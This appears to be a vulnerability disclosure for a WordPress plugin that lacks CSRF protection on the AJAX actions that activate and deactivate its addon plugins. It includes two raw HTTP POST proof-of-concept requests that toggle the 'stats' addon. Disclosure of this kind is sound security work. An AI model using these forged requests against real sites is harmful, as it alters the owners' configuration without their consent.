The plugin does not have Cross-Site Request Forgery (CSRF) checks when activating and deactivating addon plugins, which could allow attackers to make logged in users perform such actions via Cross-Site Request Forgery (CSRF) attacks.

Proof of Concept

Activate stats addon plugin exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=rb_activate_included_plugin&plugin=stats

Deactivate stats addon plugin exploit:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=rb_deactivate_included_plugin&plugin=stats